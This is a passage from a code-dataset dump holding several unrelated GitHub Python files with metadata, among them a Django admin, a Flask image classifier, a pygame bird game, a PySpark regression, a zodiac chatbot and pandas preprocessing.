User\nfrom accounts.models.wallet import Wallet\n\n\nclass UserAdmin(admin.ModelAdmin):\n \"\"\"User admin class for user model in admin panel\"\"\"\n\n list_display = (\n \"id\",\n \"user_name\",\n \"is_active\",\n \"is_staff\",\n \"amount\",\n \"update_at\",\n )\n search_fields = (\"user_name\",)\n\n list_filter = (\n \"is_active\",\n \"is_staff\",\n )\n\n\nclass WalletAdmin(admin.ModelAdmin):\n \"\"\"Wallet admin for wallet model in admin panel for showing more data\"\"\"\n\n list_display = (\n \"uuid\",\n \"user\",\n \"amount\",\n \"created_at\",\n )\n search_fields = (\"user\",)\n\n\nadmin.site.register(User, UserAdmin)\nadmin.site.register(Wallet, WalletAdmin)\n", "repo_name": "houshmand-2005/Crypto_Buy_System", "sub_path": "src/accounts/admin.py", "file_name": "admin.py", "file_ext": "py", "file_size_in_byte": 779, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.contrib.admin.ModelAdmin", "line_number": 6, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 6, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 25, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 25, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 37, "usage_type": "call"}, {"api_name": "accounts.models.user.User", "line_number": 37, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 37, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 37, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 38, "usage_type": "call"}, {"api_name": "accounts.models.wallet.Wallet", "line_number": 38, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 38, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 38, "usage_type": "name"}]} +{"seq_id": "29343500447", "text": "# import necessary libraries\nimport cv2\nimport tensorflow as tf\nimport os\nfrom tensorflow.keras.preprocessing import image\nimport numpy as np\nfrom tensorflow import keras\nfrom keras.models import load_model\nfrom flask import (\n Flask,\n render_template,\n jsonify,\n request,\n redirect)\n\napp = Flask(__name__)\n\n# create function to parse the image and predict\ndef prepare(filepath):\n IMG_SIZE = 100\n x = cv2.imread(filepath, cv2.IMREAD_GRAYSCALE)\n x = cv2.resize(x, (IMG_SIZE,IMG_SIZE))\n x = x.reshape(-1, IMG_SIZE, IMG_SIZE, 1)\n x = tf.cast(x, tf.float32)\n return x\n \n \ndef predict(filepath): \n CATEGORIES = ['Dog','Cat']\n model = load_model(\"catsdogs.model\")\n predictions = model.predict([prepare(filepath)])\n return CATEGORIES[int(predictions[0][0])]\n\n\n@app.route(\"/\")\ndef index():\n \"\"\"Return the homepage.\"\"\"\n return render_template(\"index.html\")\n\n@app.route(\"/filelink/<file_name>\")\ndef filelink(file_name):\n result = predict(file_name)\n return jsonify(result)\n\n\nif __name__ == \"__main__\":\n app.run()\n", "repo_name": "KalicoRacer/P3-paranormal_hacktivity", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1072, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 21, "usage_type": "call"}, {"api_name": "cv2.IMREAD_GRAYSCALE", 
"line_number": 21, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 22, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 24, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 24, "usage_type": "attribute"}, {"api_name": "keras.models.load_model", "line_number": 30, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 38, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "13097145835", "text": "from sys import stdin\nfrom collections import deque\n\ndef solution(N, M, dice, board, moves):\n EAST, WEST, NORTH, SOUTH = 1, 2, 3, 4\n inst = {EAST:(1, 0, slice(3,6), (0,1)),\n WEST:(-1, -1, slice(3,6), (0,-1)),\n NORTH:(-1, -1, slice(1,None,3), (-1,0)),\n SOUTH:(1, 0, slice(1,None,3), (1,0))} # rotation, replace, slice, offset\n dice_map = [0]*9\n dice_btm = 0\n\n for m in moves:\n rot, rep, slc, off = inst[m]\n t_dice = [sum(i) for i in zip(dice, off)]\n if all([0 <= c < l for c, l in zip(t_dice,(N,M))]):\n dice = t_dice\n vals = deque(dice_map[slc])\n vals.rotate(rot)\n\n new_bottom = vals[rep]\n vals[rep] = dice_btm\n dice_btm = new_bottom\n\n dice_map[slc] = vals\n\n if board[dice[0]][dice[1]] == 0:\n board[dice[0]][dice[1]] = dice_btm\n else:\n dice_btm = board[dice[0]][dice[1]]\n board[dice[0]][dice[1]] = 0\n\n print(dice_map[4])\n\nN, M, dice, board, moves = 0, 0, [0,0], [], []\nfor i, row in enumerate(stdin.readlines()):\n if i == 0:\n N, M, dice[0], dice[1], _ = map(int, row.strip().split(' '))\n continue\n if i <= N:\n board.append(list(map(int, row.strip().split(' '))))\n else:\n moves = tuple(map(int, row.strip().split(' ')))\n\nsolution(N, M, dice, board, moves)\n", "repo_name": "grasshopperTrainer/coding_practice", "sub_path": "baekjoon/accepted/14499 주사위 굴리기.py", "file_name": "14499 주사위 굴리기.py", "file_ext": "py", "file_size_in_byte": 1417, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "collections.deque", "line_number": 18, "usage_type": "call"}, {"api_name": "sys.stdin.readlines", "line_number": 36, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 36, "usage_type": "name"}]} +{"seq_id": "18362600335", "text": "from pyspark.sql import SparkSession\r\nfrom pyspark.ml.regression import LinearRegression\r\nfrom pyspark.ml.linalg import Vectors\r\nfrom pyspark.ml.feature import VectorAssembler\r\n\r\nimport platform \r\nprint(platform.python_version())\r\n\r\nspark = SparkSession.builder.appName('lr_example').getOrCreate()\r\n\r\n# Use Spark to read in the Ecommerce Customers csv file.\r\ndata = spark.read.csv(\"hdfs:///user/maria_dev/MachineLearning/Ecommerce_Customers.csv\",inferSchema=True,header=True)\r\n# Print the Schema of the DataFrame\r\nprint(\"-------------------------------------data and data schema----------------------------------------------\")\r\ndata.printSchema()\r\ndata.show()\r\n\r\n# Set up dataframe for machine learning\r\n# A few things we need to do before Spark can accept the data!\r\n# It needs to be in the form of two columns\r\n# (\"label\",\"features\")\r\n\r\nassembler = VectorAssembler(\r\n inputCols=[\"Avg Session Length\", \"Time on App\", \r\n \"Time on Website\",'Length of Membership'],\r\n outputCol=\"features\")\r\noutput = assembler.transform(data)\r\n\r\nprint(\"-------------------------------------output 
features-------------------------------------------------------\")\r\noutput.select(\"features\").show()\r\noutput.show()\r\nfinal_data = output.select(\"features\",'Yearly Amount Spent')\r\ntrain_data,test_data = final_data.randomSplit([0.7,0.3])\r\n\r\nprint(\"-------------------------------------train test data information----------------------------------------------\")\r\ntrain_data.describe().show()\r\ntest_data.describe().show()\r\n\r\n# Create a Linear Regression Model object\r\nlr = LinearRegression(labelCol='Yearly Amount Spent')\r\n\r\n# Fit the model to the data and call this model lrModel\r\nlrModel = lr.fit(train_data)\r\n\r\n# Print the coefficients and intercept for linear regression\r\nprint(\"Coefficients:\" + str(lrModel.coefficients) )\r\nprint(\"Intercept: \" + str(lrModel.intercept))\r\ntest_results = lrModel.evaluate(test_data)\r\n# Interesting results....\r\ntest_results.residuals.show()\r\nunlabeled_data = test_data.select('features')\r\npredictions = lrModel.transform(unlabeled_data)\r\npredictions.show()\r\nprint(\"RMSE: \" + str(test_results.rootMeanSquaredError))\r\nprint(\"MSE: \"+ str(test_results.meanSquaredError))\r\nspark.stop()\r\n\r\n", "repo_name": "AlphaSunny/MachineLearning", "sub_path": "pyspark/LinearRegression/LinearRegressionEcommerceCustomers.py", "file_name": "LinearRegressionEcommerceCustomers.py", "file_ext": "py", "file_size_in_byte": 2213, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "platform.python_version", "line_number": 7, "usage_type": "call"}, {"api_name": "pyspark.sql.SparkSession.builder.appName", "line_number": 9, "usage_type": "call"}, {"api_name": "pyspark.sql.SparkSession.builder", "line_number": 9, "usage_type": "attribute"}, {"api_name": "pyspark.sql.SparkSession", "line_number": 9, "usage_type": "name"}, {"api_name": "pyspark.ml.feature.VectorAssembler", "line_number": 23, "usage_type": "call"}, {"api_name": "pyspark.ml.regression.LinearRegression", "line_number": 40, "usage_type": "call"}]}
{"seq_id": "44969696997", "text": "from typing import List\n\nimport pygame\nfrom pygame import Rect\nfrom random import randint\n\npygame.init()\n\nWIDTH, HEIGHT = 800, 600\nGPS = 60\n\nwindows = pygame.display.set_mode((WIDTH, HEIGHT))\nclock = pygame.time.Clock()\n# font for the on-screen text\nfont1 = pygame.font.Font(None, 35)\nfon2 = pygame.font.Font(None, 85)\n\nimgfon = pygame.image.load('image/fon.png')  # background image\nimgBird = pygame.image.load('image/bird.png')  # bird image\nimgPipeupp = pygame.image.load('image/pipe_top.png')  # top pipe\nimgPipedown = pygame.image.load('image/pipe_bottom.png')\n\n# background music\npygame.mixer.music.load('music/shi_fon.mp3')  # load the sound file\npygame.mixer.music.set_volume(0.1)  # volume, from 0 to 1\npygame.mixer.music.play(-1)  # loop playback forever (-1)\n\n\n# sound effects\nsndFall = pygame.mixer.Sound('music/mouse_ok_format.wav')\n\npy, sy, ay = HEIGHT // 2, 0, 0\nplayers = pygame.Rect(WIDTH // 3, py, 34, 24)  # rect position, width and height\n\nframe = 0\nanimatsiya = 0\nstat = 'start'\ntimer = 10\npipes = []\nfon = []\npipesScores = []\nlives = 3\nscores = 0\n\npipeSpeed = 3\npipeGateSize = 200\npipeGatePos = HEIGHT // 2\n\n\nfon.append(pygame.Rect(0, 0, 288, 600))\n\n\n\nplay = True\nwhile play:\n    for event in pygame.event.get():\n        if event.type == pygame.QUIT:\n            play = False\n\n    # controls\n    press = pygame.mouse.get_pressed()  # state of all mouse 
buttons\n    keys = pygame.key.get_pressed()\n    click = press[0] or keys[pygame.K_SPACE]  # True while the mouse button or the spacebar is pressed\n\n    if timer > 0:\n        timer -= 1\n    animatsiya = (animatsiya + 0.2) % 4\n\n    #frame = (frame + 0.2) % 4\n    pipeSpeed = 3 + scores // 100\n# background\n    for i in range(len(fon)-1, -1, -1):\n        f = fon[i]\n        f.x -= pipeSpeed // 2\n\n        if f.right < 0:\n            fon.remove(f)\n\n\n    if fon[len(fon)-1].right <= WIDTH:\n        fon.append(pygame.Rect(fon[len(fon)-1].right, 0, 288, 600))\n        #fon.append(pygame.Rect(fon[len(fon)-1].right, 0, 288, 600))\n\n    # move the pipes\n    for i in range(len(pipes)-1, -1, -1):\n        pipe = pipes[i]\n        #pipe.x -= 3\n\n        pipe.x -= pipeSpeed\n\n        if pipe.right < 0:\n            pipes.remove(pipe)\n            if pipe in pipesScores:\n                pipesScores.remove(pipe)\n\n    if stat == 'start':\n        if click and timer == 0 and len(pipes) == 0:\n            stat = 'play'\n\n        py += (HEIGHT // 2 - py) * 0.1\n        players.y = py\n\n    # while the button is held\n    elif stat == 'play':\n        if click:\n            ay = -2\n        else:\n            ay = 0\n\n        # fall downward\n        py += sy\n        sy = (sy + ay + 1) * 0.98  # speed\n        players.y = py\n\n\n\n        if len(pipes) == 0 or pipes[len(pipes) - 1].x < WIDTH - 200:\n            pipes.append(pygame.Rect(WIDTH, 0, 52, pipeGatePos - pipeGateSize // 2))\n            pipes.append(\n                pygame.Rect(WIDTH, pipeGatePos + pipeGateSize // 2, 52, HEIGHT - pipeGatePos + pipeGateSize // 2))\n\n            pipeGatePos += randint(-100, 100)\n            if pipeGatePos < pipeGateSize:\n                pipeGatePos = pipeGateSize\n            elif pipeGatePos > HEIGHT - pipeGateSize:\n                pipeGatePos = HEIGHT - pipeGateSize\n\n\n\n\n        if len(pipes) == 0 or pipes[len(pipes)-1].x < WIDTH - 200:\n            pipes.append(pygame.Rect(WIDTH, 0, 50, 200))\n            pipes.append(pygame.Rect(WIDTH, 400, 50, 200))\n\n        if players.top < 0 or players.bottom > HEIGHT:\n            stat = 'fall'\n\n        for pipe in pipes:\n            if players.colliderect(pipe):\n                stat = 'fall'\n\n        # if pipe.right < players.left and pipe not in pipesScores:\n        #     pipesScores.append(pipe)\n        #     scores += 5\n\n\n\n\n\n\n    # if len(pipes) == 0 or pipes[len(pipes)-1].x < WIDTH - 200:\n    #     pipes.append(pygame.Rect(WIDTH, 0, 50, 200))\n    #     pipes.append(pygame.Rect(WIDTH, 400, 50, 200))\n    # ###\n    # # check that the bird stays within the screen bounds\n    # if players.top < 0 or players.bottom > HEIGHT:\n    #     stat = 'fall'\n    # for pipe in pipes:\n    #     if players.colliderect(pipe):\n    #         stat = 'fall'\n    #\n# TODO: figure out why the bird does not return to its previous position and obstacles are not hit; something was deleted, review\n\n\n    elif stat == 'fall':\n        sndFall.play()  # impact sound\n        sy, ay = 0, 0\n        pipeGatePos = HEIGHT // 2\n        stat = 'start'\n        timer = 60\n\n        lives -= 1  # lose a life on a crash\n        if lives > 0:\n            stat = 'start'\n            timer = 60\n        else:\n            stat = 'game over'\n            timer = 120\n\n    else:\n        py += sy\n        sy = (sy + ay + 1) * 0.98  # speed\n        players.y = py\n\n        if timer == 0:\n            play = False\n\n    windows.fill(pygame.Color('black'))\n    for f in fon:\n        windows.blit(imgfon, f)\n\n    for pipe in pipes:\n        if pipe.y == 0:\n            rect = imgPipeupp.get_rect(bottomleft= pipe.bottomleft)\n            windows.blit(imgPipeupp, rect)\n        else:\n            rect = imgPipedown.get_rect(topleft=pipe.topleft)\n            windows.blit(imgPipedown, rect)\n\n    imageBird = imgBird.subsurface(34 * int(animatsiya), 0, 34, 24)\n    imageBird = pygame.transform.rotate(imageBird, -sy * 2)\n    windows.blit(imageBird, players)  # draw the bird\n\n    #print(animatsiya)\n    text = font1.render('Очки: ' +str(scores), 1, pygame.Color('black'))\n    windows.blit(text, (10,10))\n\n    tex = font1.render('Жизни ' + str(lives), 1, pygame.Color('black'))\n    windows.blit(tex, (10,HEIGHT- 30))\n\n    pygame.display.update()\n    
clock.tick(GPS)\n\npygame.quit()\n", "repo_name": "MK129y/bird_up_and_stolbi", "sub_path": "bird_code_and_music.py", "file_name": "bird_code_and_music.py", "file_ext": "py", "file_size_in_byte": 6200, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pygame.init", "line_number": 7, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 12, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 13, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 13, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 16, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 16, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 18, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 18, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 19, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 19, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 20, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.load", "line_number": 24, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 24, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.set_volume", "line_number": 25, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 25, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.play", "line_number": 26, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 26, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 30, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 30, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 33, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 50, "usage_type": "call"}, {"api_name": "pygame.event.get", "line_number": 56, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 56, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 57, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pressed", "line_number": 61, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 61, "usage_type": "attribute"}, {"api_name": "pygame.key.get_pressed", "line_number": 62, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 62, "usage_type": "attribute"}, {"api_name": "pygame.K_SPACE", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pygame.Rect", "line_number": 81, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 118, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 120, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 122, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 132, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 133, "usage_type": "call"}, {"api_name": "pygame.Color", "line_number": 188, "usage_type": "call"}, {"api_name": "pygame.transform.rotate", "line_number": 
201, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 201, "usage_type": "attribute"}, {"api_name": "pygame.Color", "line_number": 205, "usage_type": "call"}, {"api_name": "pygame.Color", "line_number": 208, "usage_type": "call"}, {"api_name": "pygame.display.update", "line_number": 211, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 211, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 214, "usage_type": "call"}]} +{"seq_id": "24863485771", "text": "\"\"\"A collection of function for doing my project.\"\"\"\nimport string\nimport random\nfrom bs4 import BeautifulSoup\nfrom urllib.request import urlopen\n\n\n\n\ndef begin():\n \"\"\"This is main area of the chatbot, this where all\n of the functions connect back to and where the function\n ends\n \n Parameters\n ----------\n none\n \n Returns\n -------\n none\n \"\"\"\n \n chat = True\n while chat == True:\n \n \n # greeting function called to get their name/tell them\n # that this is a Zodiac sign guessing bot\n greet()\n \n # inputs a yes or not really to redirect them accordingly\n undstd = input(\"\\nZodi : Do you know what a Zodiac Sign is?\\n\"\n \" \\n\"\n \" If yes please respond 'Yes!', if not respond 'Not really'\\n\")\n \n # route if they don't need more info\n if undstd == 'Yes!': \n next = (no_info())\n if next == ask_bday:\n print(ask_bday)\n their_sign()\n break\n else: \n break \n # route if they need more info\n elif undstd == 'Not really':\n next = (more_info())\n if next == ask_bday:\n print(ask_bday)\n their_sign()\n break\n else:\n break\n else:\n chat = False\n break\n \n \ndef greet():\n \"\"\"This is my greeting funtion, I greet them with a \n random greeting from introduce list, then I take in\n their name and have my bot introduce themself\n \n Input\n ---------\n name : str\n takes in their name/nickname\n my_response : list\n list different ways to ask their name\n \n Outputs\n -------\n print : \n prints out welcome message/bot introduces self\n \"\"\"\n \n # picks random responce from list and has them input their name\n # to then add their name into the welcome message\n name = input(random.choice(introduce))\n print(\"\\nZodi : Hi there #, it's very nice to meet you!\\n\"\n \" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n\"\n \" My name is Zodi The Zodiac Expert, I absolutely\\n\"\n \" love meeting new people, and also love telling \\n\"\n \" my new friends what their Zodiac sign is!\\n\".replace(\"#\", name))\n \n \n \ndef their_sign():\n \"\"\"Runs my other Zodiac_sign function and prints its\n results, then continues on to wrap up the function\n by pulling a random response from my relatable list \n and printing it, then printing my farewell string\n \n Inputs\n ----------\n relatable : list\n list of quirky response\n \n Output\n -------\n sign : \n outputs the sign of the person\n \"\"\"\n \n # outputs persons sign\n sign = zodiac_sign()\n \n # prints random response from relatable list\n print(random.choice(relatable))\n \n # wraps up the chat with my farewell string\n print(farewell)\n chat = False\n \n \n \ndef no_info():\n \"\"\"This is the function they're directed to if they\n don't need to learn about Zodiac signs, it asks them \n if I can tell them their sign, or if not it ends the chat\n \n Inputs\n ----------\n ask_per1 : str\n asks if bot can guess their sign\n say_sign: str\n conntinues or ends chat\n \n Returns\n -------\n ask_bday : str\n asks for their bday\n \"\"\"\n \n # inputs sure or no thank you and directs them 
accordingly\n say_sign = input(ask_per1)\n \n # continues on to ask their birth date or ends chat\n if say_sign == 'Sure!':\n return(ask_bday)\n \n elif say_sign == 'No thank you':\n print(\"\\nZodi : That's okay, have a nice day. Goodbye!\")\n chat = False\n else:\n chat = False\n\n \ndef more_info():\n \"\"\"This is the function that they're directed to if\n they don't know much about zodiac signs, it pulls \n some text from a website about Zodiac Signs\n \n Inputs\n ----------\n ask_per2 : str\n asks if I can guess their sign\n ask_bday : str\n asks for their birthday\n \n Returns\n -------\n ask_bday : str\n asks for their birth month/day\n \"\"\"\n \n # info/variables that gets text from website\n # this little chunk of how to convert the text is from \n #https://realpython.com/python-web-scraping-practical-introduction/\n url = \"https://www.astrology-zodiac-signs.com/\"\n page = urlopen(url)\n html = page.read().decode(\"utf-8\")\n soup = BeautifulSoup(html, \"html.parser\")\n table = soup.find('div',attrs={\"class\":\"main-b\"})\n \n # states where the text is from and how much to read\n print(give_info)\n \n \n print(table.get_text())\n \n # asks if I can now tell them their sign\n say_sign = input(ask_per2)\n \n # conditionals to direct them based on their answers to \n # me asking for their permission\n if say_sign == 'Sure!':\n return(ask_bday)\n elif say_sign == 'No thank you':\n print(\"\\nZodi : That's okay, have a nice day. Goodbye!\")\n chat = False\n else:\n chat = False\n \n \ndef zodiac_sign():\n \"\"\"This is the function that actually takes in their\n birth month/day and prints out their sign with the\n corresponding emoji symbol\n \n Parameters\n ----------\n month : int\n \n day : int\n \n Outputs\n ------\n print : str\n prints their sign\n \"\"\"\n \n # where they input their birth month/day\n month = int(input(\"Month# : \"))\n day = int(input(\"Day# : \"))\n \n # long series of conditionals to determine their sign\n # prints out their sign with the emoji that goes along with it\n if month == 1 and day <= 19:\n print('Results : Capricorn \\N{capricorn}')\n elif month == 1 and day > 19:\n print ('Results : Aquarius \\N{aquarius}')\n elif month == 2 and day <= 19:\n print ('Results : Aquarius \\N{aquarius}')\n elif month == 2 and day > 19:\n print ('Results : Pisces \\N{pisces}')\n elif month == 3 and day <= 20:\n print ('Results : Pisces \\N{pisces}')\n elif month == 3 and day > 20:\n print ('Results : Aries \\N{aries}')\n elif month == 4 and day <= 20:\n print ('Results : Aries \\N{aries}')\n elif month == 4 and day > 20:\n print ('Results : Taurus \\N{taurus}')\n elif month == 5 and day <= 20:\n print ('Results : Taurus \\N{taurus}')\n elif month == 5 and day >20:\n print ('Results : Gemini \\N{gemini}')\n elif month == 6 and day <= 20:\n print ('Results : Gemini \\N{gemini}')\n elif month == 6 and day > 20:\n print ('Results : Cancer \\N{cancer}')\n elif month == 7 and day <= 22:\n print ('Results : Cancer \\N{cancer}')\n elif month == 7 and day > 22:\n print ('Results : Leo \\N{leo}')\n elif month == 8 and day <= 22:\n print ('Results : Leo \\N{leo}')\n elif month == 8 and day > 22:\n print ('Results : Virgo \\N{virgo}')\n elif month == 9 and day <= 22:\n print ('Results : Virgo \\N{virgo}')\n elif month == 9 and day > 22:\n print ('Results : Libra \\N{libra}')\n elif month == 10 and day <= 22:\n print ('Results : Libra \\N{libra}')\n elif month == 10 and day > 22:\n print ('Results : Scorpio \\N{scorpius}')\n elif month == 11 and day <= 22:\n print ('Results 
: Scorpio \\N{scorpius}')\n elif month == 11 and day > 22:\n print ('Results : Sagittarius \\N{sagittarius}')\n elif month == 12 and day <= 23:\n print ('Results : Sagittarius \\N{sagittarius}')\n elif month == 12 and day > 23:\n print ('Results : Capricorn \\N{capricorn}')\n \n# long series of lists/variables that get used throughout the function\nintroduce = [\"Zodi : Hello lovely! What's your name? : \",\n \"Zodi : Hi friend! What's your name? : \"]\n\nrelatable = [\"\\nZodi : That's crazy, my mom is the same sign as you!\\n\",\n \"\\nZodi : OMG my mom's cousin's brother's dog is that sign!\\n\",\n \"\\nZodi : My bestfriend is that sign too, how crazy!\\n\",\n \"\\nZodi : That's one of my favorite signs how cool!\\n\",\n \"\\nZodi : Oof, my ex was that sign haha!\\n\"]\n\nfarewell = ('\\nZodi : Well it was absolutely wonderful getting to meet you!\\n'\n ' I hope you send your friends over to learn about their signs,\\n'\n ' hope to chat with you later, GoodBye!\\n'\n ' \\n'\n ' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n'\n ' \\n'\n ' If you would like to know more about what your specific sign means,\\n'\n ' you can head over to https://www.astrology-zodiac-signs.com/\\n'\n ' to learn more about it!')\n\nask_bday = (\"\\nZodi : Yay, how exciting!\\n\"\n \" \\n\"\n \" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n\"\n \" \\n\"\n \" I'll just need two things from you, the\\n\"\n \" month and day you were born!\\n\"\n \" \\n\"\n \" Please responce in the format way: \\n\"\n \" \\n\"\n \" Input the month # you were born, then hit return on keyboard\\n\"\n \" Then input the day # you were born, hit return again\\n\"\n \" \\n\"\n \" Example : If I was born Jan 3rd, I'd input\\n\"\n \" '1' then return, then '3' and return again\\n\")\n \ngive_info = (\"\\nZodi : That's absoloutely okay, I love getting\\n\"\n \" to teach people something new!\\n\"\n \" \\n\"\n \" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n\"\n \" \\n\"\n \" Here's some information on Zodiac Signs from\\n\"\n \" https://www.astrology-zodiac-signs.com/,\\n\"\n \" if you'd just like to know what your sign means\\n\"\n \" you can just read the first little paragraph, but\\n\"\n \" if you'd like to deep-dive you can read the whole thing!\\n\"\n \" \\n\"\n \" ~SCROLL TO BOTTOM TO CONTINUE~\\n\")\n\nask_per1 = (\"\\nZodi : Perfect! Since you're my new friend,\\n\"\n \" can I tell you your Zodiac sign?\\n\"\n \" \\n\"\n \" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n\"\n \" \\n\"\n \" Please respond 'Sure!' if I can or \\n\"\n \" 'No thank you' to end chat\\n\")\n\nask_per2 = (\"\\n Zodi : Now that you know a little bit more about\\n\"\n \" what a Zodiac Sign is, can I tell you yours?!\\n\"\n \" \\n\"\n \" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n\"\n \" \\n\"\n \" Please respond 'Sure!' 
if I can or \\n\"\n \" 'No thank you' to end chat\\n\")\n\n \n", "repo_name": "bescobar25/COGS18-Final", "sub_path": "functions.py", "file_name": "functions.py", "file_ext": "py", "file_size_in_byte": 10799, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "random.choice", "line_number": 80, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 110, "usage_type": "call"}, {"api_name": "urllib.request.urlopen", "line_number": 172, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 174, "usage_type": "call"}]} +{"seq_id": "40265952237", "text": "import os\nimport pandas as pd\nimport torch\n\n\ndef makedir_csv():\n os.makedirs(os.path.join('.', 'data'), exist_ok=True)\n data_files = os.path.join('.', 'data', 'house_tiny.csv')\n with open(data_files, 'w') as f:\n f.write('NumRooms,Alley,Price\\n') # 列名\n f.write('NA,Pave,127500\\n')\n f.write('2,NA,106000\\n')\n f.write('4,NA,178100\\n')\n f.write('NA,NA,140000\\n')\n return data_files\n\n\ndef Handle_missing_values(csv_files):\n # 将连续的NAN值取平均值进行填充\n inputs, outputs = csv_files.iloc[:, 0:2], csv_files.iloc[:, 2]\n inputs = inputs.fillna(inputs.mean())\n return inputs, outputs\n\n\ndef get_dummy(inputs):\n # 将离散的NAN值置为0或1\n inputs = pd.get_dummies(inputs, dummy_na=True)\n # print(inputs)\n return inputs\n\n\n# ****将输入转换成张量****\ndef data_to_tensor(input, output):\n x, y = torch.tensor(input.values), torch.tensor(output.values)\n return x, y\n\n\ndata_file = makedir_csv()\ndata = pd.read_csv(data_file)\ninput, output = Handle_missing_values(data)\ninputs = get_dummy(input)\nx, y = data_to_tensor(inputs, output)\n# print(x)\n# print(y)\n\n# print(inputs)\n# print(data)\n\n", "repo_name": "Zhangxx-NaMuu/DeepLearningNote", "sub_path": "two/data_preprocessing.py", "file_name": "data_preprocessing.py", "file_ext": "py", "file_size_in_byte": 1180, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.makedirs", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "pandas.get_dummies", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 34, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "31834157997", "text": "#!/usr/bin/env python3\n\n#----------------------------------------------------------------------------------------\n#\n# Name: md-id.py\n# Version: v.2\n# Date: 2016-00-00\n# Author: David Durden\n# Description: Searches the Internet Archive for a provided term and generates\n# a list of item ids related to that serach term.\n# Usage: python3 md-id.py foo 